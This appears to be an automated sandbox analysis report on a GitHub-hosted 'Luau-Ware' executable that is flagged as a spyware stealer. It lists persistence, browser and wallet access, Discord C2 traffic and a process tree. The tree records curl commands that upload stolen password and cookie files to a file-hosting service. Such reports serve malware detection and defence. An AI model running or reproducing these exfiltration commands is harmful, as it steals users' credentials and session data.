hxxps://github[.]com/treesnapse/luau-ware/releases/tag/Luau-Ware

Resubmissions

17/05/2024, 14:58

240517-sb5rpada99 7

17/05/2024, 14:55

240517-sagcpscg5y 1

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17/05/2024, 14:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/treesnapse/luau-ware/releases/tag/Luau-Ware

Score

7^/10

pyinstaller spyware stealer

Malware Config

Signatures

Drops startup file 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Luau-Ware.exe	Luau-Ware.exe

Executes dropped EXE 14 IoCs

pid	Process
4888	Luau-Ware.exe
1632	Luau-Ware.exe
5500	Luau-Ware.exe
5944	Luau-Ware.exe
6060	Luau-Ware.exe
3688	Luau-Ware.exe
4140	Luau-Ware.exe
832	Luau-Ware.exe
5244	Luau-Ware.exe
1060	Luau-Ware.exe
5308	Luau-Ware.exe
3592	Luau-Ware.exe
3376	Luau-Ware.exe
4860	Luau-Ware.exe

Loads dropped DLL 64 IoCs

pid	Process
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
1632	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe
5944	Luau-Ware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
278	discord.com
335	discord.com
260	discord.com
234	discord.com
244	discord.com
364	discord.com
151	discord.com
325	discord.com
353	discord.com
367	discord.com
223	discord.com
217	discord.com
273	discord.com
316	discord.com
160	discord.com
237	discord.com
241	discord.com
287	discord.com
297	discord.com
300	discord.com
331	discord.com
338	discord.com
198	discord.com
332	discord.com
360	discord.com
153	discord.com
238	discord.com
248	discord.com
274	discord.com
334	discord.com
144	discord.com
150	discord.com
219	discord.com
280	discord.com
315	discord.com
102	discord.com
166	discord.com
170	discord.com
199	discord.com
205	discord.com
299	discord.com
125	discord.com
142	discord.com
262	discord.com
292	discord.com
303	discord.com
330	discord.com
351	discord.com
137	discord.com
340	discord.com
177	discord.com
141	discord.com
291	discord.com
314	discord.com
103	discord.com
342	discord.com
357	discord.com
128	discord.com
337	discord.com
163	discord.com
175	discord.com
276	discord.com
333	discord.com
363	discord.com

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
187	api.ipify.org
85	api.ipify.org
131	api.ipify.org
185	api.ipify.org
304	api.ipify.org
307	api.ipify.org
86	api.ipify.org
253	api.ipify.org
254	api.ipify.org

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023656-278.dat	pyinstaller
behavioral1/files/0x00070000000236c9-792.dat	pyinstaller

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates processes with tasklist 1 TTPs 7 IoCs

Process Discovery

T1057

pid	Process
944	tasklist.exe
3640	tasklist.exe
3696	tasklist.exe
5292	tasklist.exe
5400	tasklist.exe
4900	tasklist.exe
6036	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = ac0790237ba1da01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 18 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{152516D3-145E-11EF-B8C0-D64620966489} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{27F73E8F-14F6-48F0-A6EF-7A8E30D7DA7F}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133604314971306211"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
2868	chrome.exe
2868	chrome.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2868	chrome.exe
2868	chrome.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeShutdownPrivilege	2868	chrome.exe
Token: SeCreatePagefilePrivilege	2868	chrome.exe
Token: SeRestorePrivilege	5264	7zG.exe
Token: 35	5264	7zG.exe
Token: SeSecurityPrivilege	5264	7zG.exe
Token: SeSecurityPrivilege	5264	7zG.exe
Token: SeDebugPrivilege	4900	tasklist.exe
Token: SeDebugPrivilege	6036	tasklist.exe
Token: SeDebugPrivilege	944	tasklist.exe
Token: SeDebugPrivilege	3640	tasklist.exe
Token: SeDebugPrivilege	3696	tasklist.exe
Token: SeDebugPrivilege	5972	taskmgr.exe
Token: SeSystemProfilePrivilege	5972	taskmgr.exe
Token: SeCreateGlobalPrivilege	5972	taskmgr.exe
Token: SeDebugPrivilege	5292	tasklist.exe
Token: SeDebugPrivilege	5400	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
5264	7zG.exe
5028	iexplore.exe
5028	iexplore.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe

Suspicious use of SendNotifyMessage 63 IoCs

pid	Process
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
2868	chrome.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe
5972	taskmgr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4956	OpenWith.exe
4956	OpenWith.exe
4956	OpenWith.exe
5128	OpenWith.exe
5028	iexplore.exe
5028	iexplore.exe
5132	IEXPLORE.EXE
5132	IEXPLORE.EXE
1580	OpenWith.exe
1580	OpenWith.exe
1580	OpenWith.exe
4468	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 2792	2868	chrome.exe	90
PID 2868 wrote to memory of 2792	2868	chrome.exe	90
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 636	2868	chrome.exe	92
PID 2868 wrote to memory of 4992	2868	chrome.exe	93
PID 2868 wrote to memory of 4992	2868	chrome.exe	93
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94
PID 2868 wrote to memory of 3668	2868	chrome.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/treesnapse/luau-ware/releases/tag/Luau-Ware
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd330ab58,0x7ffcd330ab68,0x7ffcd330ab78
  2⤵
  PID:2792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:2
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:3668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3024 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:1
  2⤵
  PID:2116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:3932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4540 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:3952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:5244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1884,i,14996072154244225524,3415761307424932126,131072 /prefetch:8
  2⤵
  PID:5472

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4256,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1300 /prefetch:8
1⤵
PID:1388

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1784

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\" -ad -an -ai#7zMap3602:96:7zEvent30629
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5264

C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
"C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
1⤵
- Executes dropped EXE
PID:4888
- C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe
  "C:\Users\Admin\Downloads\Luau-Ware-V.1.5.6\Luau-Ware.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist"
    3⤵
    PID:6060
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:2400
  - - C:\Windows\system32\curl.exe
      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
      4⤵
      PID:6004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
    3⤵
    PID:5284
  - - C:\Windows\system32\curl.exe
